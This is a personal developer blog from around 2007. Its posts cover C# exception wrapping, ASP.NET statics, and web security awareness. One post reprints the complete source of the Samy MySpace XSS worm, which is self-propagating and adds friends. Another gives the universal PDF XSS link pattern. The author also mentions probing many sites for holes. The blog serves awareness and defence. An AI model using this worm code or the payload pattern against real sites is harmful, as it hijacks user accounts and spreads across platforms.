Shimon Krokhmal's blog

couple weeks ago, my friend and co-worker, shani raba, presented me a problem.
they have some sealed application as an .exe file that throws some exceptions and crashes their application.

So, i Thought that is a good idea to wrap the targeted application with reflection, and catch the unhandled thrown exceptions.

to demonstrate this,
I've created an application with a button that throws an exception.

private void button1_Click(object sender, System.EventArgs e)
{
    throw new Exception("my Exception, need to be wrapped");
}

the next thing that we need to create is the wrapper.

so, creating a console application with this code should have solved the problem:

[STAThread]
static void Main(string[] args)
{

    Assembly assembly = Assembly.LoadFrom ("cashTester.exe");

    Type t = assembly.GetType("cashTester.Form1");
    object o = Activator.CreateInstance(t);
    try
    {
        Application.Run((Form)o);
    }
    catch(Exception ex)
    {
        Console.Write("exception was thrown : " + ex.Message);
    }
}

running this code in debug mode successfully catch the exception from the winform.
but, for some reason, in a normal run, this code won't catch the exception.

makes you wonder, huh ?

so i did some thinking, what on earth can make this phenomena ?
The answer is : Threads.
Yes, like it or not, but this is the subject that everyone tries to avoid it.
everyone knows it exists, and no one really likes it,
but we can't run from the problem, we need to confront it.

So, what can we do ?

since Application.Run launches a new thread, we can add to the Application.ThreadException event handler, an exception handling method.

like this class :

 

/// <summary>
/// The Wrapper class
/// </summary>
public class Wrapper
{

    /// <summary>
    /// Public cunstructor
    /// </summary>
    public Wrapper()
    {
    }

    /// <summary>
    /// This function will initialize the exception handling
    /// </summary>
    public void Init()
    {
        // define handlers for unhandled exceptions
        AppDomain.CurrentDomain.UnhandledException += new UnhandledExceptionEventHandler(this.exp);
        Application.ThreadException +=new System.Threading.ThreadExceptionEventHandler(this.ThreadExp);
    }

    /// <summary>
    /// This method is for the threads exceptions
    /// </summary>
    /// <param name="o">the object</param>
    /// <param name="args">Thread exception args</param>
    void ThreadExp(object o, System.Threading.ThreadExceptionEventArgs args)
    {
        // Write the message to the console
        Console.Write("Unhandled thread exception was thrown : " + args.Exception.Message);
    }

    /// <summary>
    /// This method is for the unhandled exceptions from the main thread
    /// </summary>
    /// <param name="o">the object</param>
    /// <param name="args">exception arguments</param>
    void exp(object o,System.UnhandledExceptionEventArgs args)
    {
        // Write the message to the console
        Console.Write("Unhandled exception was thrown : " + ((Exception)args.ExceptionObject).Message);
    }

    public void Run()
    {
        // Load the assembly
        Assembly assembly = Assembly.LoadFrom ("cashTester.exe");

        // get the type of the object
        Type t = assembly.GetType("cashTester.Form1");

        // invoke it
        object o = Activator.CreateInstance(t);

        // Run the application - note that this line starts an additional thread
        Application.Run((Form)o);
    }
}

 

now, all we need is to launch it :

/// <summary>
/// The main entry point for the application.
/// </summary>
[STAThread]
static void Main(string[] args)
{
    Wrapper w = new Wrapper();
    w.Init();
    w.Run();
}

 

now we got an exception wrapper for launching applications.

Shani, tell me if that helped ...

p.s.
There are more ways to do it, but this is the simplest one

Yesterday, good friend of mine, Lev rosenblit, asked me a good question.
what are the life cycle of static objects in an aspx page.
so, at first without any hesitation, i answered that the object will die after the request event ends.
the dude insists that I'm wrong on that matter, so i decided to check it out .

here is some code snippet to check it out :

        private static int myStaticInt = 0;
        private void Page_Load(object sender, System.EventArgs e)
        {
            myStaticInt++;
            Response.Write(myStaticInt);
        }

by theory (which is objects in an aspx page die after the end of the request), this code should print the number "1" on each request.
but the result was different, on each request, the result increased.

digging a little on the web, i found that static objects live inside the App domain and not in the page context.
This interesting fact raised some interesting question, an architectural one:
what would happen if the code run in NLB configuration (Network Load Balancing)?

on that matter their is a session state issue which is solved by getting the session state from a shared database,
but what about the static objects that live inside the App domain ?
what can be done to share those object ?

from my point of view, this is a bad choice in architecture when you choosing to use static objects inside your page.
thus, it won't always work, and will be hardware Dependant system.

Let me tell you some story thats happening now.
couple month ago i hired some folks to do a part of some project due to time limits that i have.
now, i know those guys personally and checking thier technical backgroung seemed to be irrelevant (mistake no' 1).
i thought, how hard can i be to make some GUI to an application that all the other layers are done (3 tier architecture).

So, instead of 1 month development it turned to more than 3 months already, (30% progress)
god knows how long it will take them to finish it .

and now, when i finally see some progress, i see code like this :

if (!Page.IsValid)
{
}
else
{
    InsertNewCustomer();
    lblClientMessage.Text = NewClientText();
    ClearText();
}

ok, who are does guys ?
you think that a skilled programmer with 3 years of expirience would not write such crapy code like this (those things just get me mad.)
why they think that i allow such code to go on production ?
not speaking about the XSS holes that they made (just by the book....)
looks like they didn't read this guide

i mean look at this thing, how many mistakes you can do as a single code :

        private string NewClientText()
        {
            string strNewClient = txtName.Text + " " + txtFamily.Text + " " + "הוזן בהצלחה";
            return strNewClient;
        }

        private void btnAdd_Click(object sender, System.EventArgs e)
        {
            lblClientMessage.Text = "";

            if (!Page.IsValid)
            {
            }
            else
            {
                InsertNewCustomer();
                lblClientMessage.Text = NewClientText();
                ClearText();
            }
        }

        private void InsertNewCustomer()
        {
            Customers newCustomer = new Customers();

            newCustomer.Name = txtName.Text;
            newCustomer.LastName = txtFamily.Text;
            newCustomer.Notes = txtNotes.Text;
            newCustomer.isStudent = chkStudent.Checked;
            newCustomer.Phone = TxtPhone.Text;
            newCustomer.Cellular = txtCellular.Text;
            newCustomer.Email = txtEmail.Text;
            newCustomer.Address = txtAddress.Text;

            if (txtBirth.Text.Trim() != "")
            {
                newCustomer.BirthDate = Convert.ToDateTime(txtBirth.Text);
            }

            custDal.Add(newCustomer);
        }

• writing data to the page without validating it first
• some logical twists - (if page not valid, dont do anything, else do something...), why on earth ? why ?
• inserting to the database without validating the input (for those who are femilier with my architecture, validating is a single line "entity.Validate();"
• no exception managment what so ever.
• no code comments
• Client side input validations

here is some more goodies from the same author :

lblAddress.Style.Add("text-align","right");

what happened to CSS files ?
thier are lots of lines like this defining the style for every object.
i dont wanna know what are they planned to do when they need to change the style one by one .

man, this is a little piece of code, i'm affraid to see whats going on , on the rest of the code.

this is some lessons that you learn on the hard way....

"i will never hire people without checking thier technical background"
"i will never hire people without checking thier technical background"
"i will never hire people without checking thier technical background"
"i will never hire people without checking thier technical background"
"i will never hire people without checking thier technical background"
"i will never hire people without checking thier technical background"

i should better get some things to my own hands before it gets to late .
anyone wants a job to create some gui ?

 

Well,
after months I'm talking about it and couple of sleepless nights to prepare it, here it is.

So, what do have here ?

1 powerPoint presentation that explains what is Session Hijacking and XSS.
1 XSS demo.
0 Session hijacking Demo .... (why you ask ? - I'm planning to do another lecture on the topic for some those who missed it yesterday...)
0 Code included. (like the demos ....will be uploaded some time soon....)

long story short :
this presentation talks about the threats in Session hijacking.
and how to prevent it. - while its not a 100% solution, it certainly raises the bar for hackers to succeed in the session hijacking attack.

some wise man said to me once,
"for every defense that ever made, someone thought how to break it,
 the only thing we can do, is to narrow down the amount of people that is capable to perform it."

enjoy.

comments are welcomed :)

Security.pps (324 KB)

 

Ok, I'm facing a dilemma here.
Many of the site checks I've done returned positive results for security holes.
Now, the question is: what do I do next with this info?

The obvious options are:
•    Not to do anything with this info.
•    Write a full technical report regarding the security hole that found around the web (maybe a video demo?).
•    Open some security site that holds data about security Vulnerabilities
•    Provide some demo's of the hack.
•    Report to the site about the problem they have.
•    Try to make money of it? (This option more suited for a black hat hacker...)
•    Obtain the reputation of a Web security expert by exposing the security holes?
I remind you that there can be consequences for the actions that made (jail is not the favorite option...)

what do you think I should do?
Please comment here...
 
your opinion is very important to me.

if you have'nt been in such event, and you match the criteria (an israeli blogger...)
i have'nt been  on one of those, but judging by the last event comments (the previews dinner) - this event is something you wanna be there.

check out the post of the organizer :http://blogs.microsoft.co.il/blogs/omer/archive/2007/02/13/8020.aspx

A new blog surfaced in the last few days.
this one is from Doron Yaacoby.

this dude knows what he's talking about.
i would strongly recommend to pay this guy a visit

Sounds controversial, right ?
well, it is.

actually, on certain conditions, you can execute a javascript on the clients machine using PDF file.
the funny part is that it does not needed to be modified at all.

simply by creating a link at this pattern :

http://yoursite.com/file.pdf#whatever_name_you_want=javascript:your_code_here

there is XSS writen all over the place.
the sad part is that the site owners have nothing to do to prevent it.
this works with :

Firefox 2.0.0.1 win32
Firefox 1.5.0.8 win32
Opera 8.5.4 build 770 win32
Opera 9.10.8679 win32
and i'm sure that with other browsers too.

the subject brought to adobe's attention
http://www.adobe.com/support/security/advisories/apsa07-01.html
Adobe categorizes this as a critical issue and recommends affected users update any affected software.
http://www.adobe.com/support/security/bulletins/apsb07-01.html

how does this work ?(and why ???)

the PDF document gets parameters, the odd thing is that the value of those parameters can be retrieved via javascript.

more info could be found on those sites :
http://ha.ckers.org/blog/20070103/universal-xss-in-pdfs/
http://www.gnucitizen.org/blog/danger-danger-danger/

be carefull when you opening a PDF file next time

OK, maybe this is not some thing new, but it definitely not something common.

if you have'nt read my post on XSS prevention, please do so.

the story begins back in 10/04/05, when samy decided to get popular on mySpace.
he exploited the fact that MySpace allowed the user to enter some javascript to the personal page.

so the dude explored the mySpace system  and crafted a script that adds himself to the viewer's friend list.
technically, this is not a worm, but the replication of the code to each viewer's page qualify it as a worm.

here is the code of the worm :

<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>

 

the explain  of the code can be found here .
this shows several things :

• XSS can be exploited for major attacks, even for personal gains.
• XSS can be underestimated

please don't underastimate it.
this could do some major damage to your application

to prove my point i will include a demo on the next security post(session hijacking prevention)

today i was hoping to finish my "Session hijacking prevention" presentation,
so, i thought that recording a live demo would be nice.

And then(by mistake....) i discovered that document.cookie will give you an empty string on the internet Explorer 7.
nevertheless it works fine on previous versions of explorer and firefox .

did microsoft restricted the access to cookies vie javascript in IE7 ?